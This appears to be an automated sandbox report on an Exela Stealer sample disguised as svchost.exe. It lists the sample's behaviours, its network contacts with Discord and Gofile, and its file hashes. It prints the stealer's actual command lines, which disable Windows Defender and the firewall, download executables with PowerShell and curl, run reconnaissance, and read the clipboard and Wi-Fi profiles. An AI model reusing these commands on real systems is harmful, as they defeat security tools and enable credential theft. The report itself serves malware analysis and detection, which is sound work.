Analysis Overview
SHA256
126d168549578cad4d37c87fbe0d85f5516c0449e82f19314c5c07bace902797
Threat Level: Known bad
The file svchost.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Exelastealer family
Exela Stealer
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Grants admin privileges
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Unsecured Credentials: Credentials In Files
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Network Service Discovery
UPX packed file
Hide Artifacts: Hidden Files and Directories
Enumerates processes with tasklist
Launches sc.exe
Browser Information Discovery
Detects Pyinstaller
System Network Connections Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Unsigned PE
Gathers system information
Gathers network information
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Collects information from the system
Detects videocard installed
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-06-30 18:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-06-30 18:07
Reported
2025-06-30 18:09
Platform
win10v2004-20250610-en
Max time kernel
104s
Max time network
142s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Grants admin privileges
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\no defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(identical row repeated 64 times in the report: 64 UPX-packed file detections, none with a description, indicator, process or target)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Users\Admin\AppData\Local\Temp\no defender.exe
"C:\Users\Admin\AppData\Local\Temp\no defender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\curl.exe
curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqzb5d1s\yqzb5d1s.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\yqzb5d1s\CSCF6F01569631D4B3ABC3A426DD969DFBA.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:50080 | N/A | tcp |
| N/A | 127.0.0.1:50101 | N/A | tcp |
| N/A | 127.0.0.1:50106 | N/A | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:50118 | N/A | tcp |
| N/A | 127.0.0.1:50120 | N/A | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.75.242.210:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| N/A | 127.0.0.1:50285 | N/A | tcp |
| N/A | 127.0.0.1:50287 | N/A | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
Files
memory/5492-0-0x0000000000010000-0x000000000123E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Exela.exe
| MD5 | c5669d422429ecf07edc2f00821ecd93 |
| SHA1 | 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3 |
| SHA256 | 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00 |
| SHA512 | d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253 |
C:\Users\Admin\AppData\Local\Temp\no defender.exe
| MD5 | c80d2a00b97cf55170b221f8a8f65e81 |
| SHA1 | a03c17751d8db91e1e66460093855dabbcfcc04b |
| SHA256 | af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85 |
| SHA512 | 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\ucrtbase.dll
| MD5 | 3b337c2d41069b0a1e43e30f891c3813 |
| SHA1 | ebee2827b5cb153cbbb51c9718da1549fa80fc5c |
| SHA256 | c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7 |
| SHA512 | fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\python311.dll
| MD5 | db09c9bbec6134db1766d369c339a0a1 |
| SHA1 | c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b |
| SHA256 | b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79 |
| SHA512 | 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
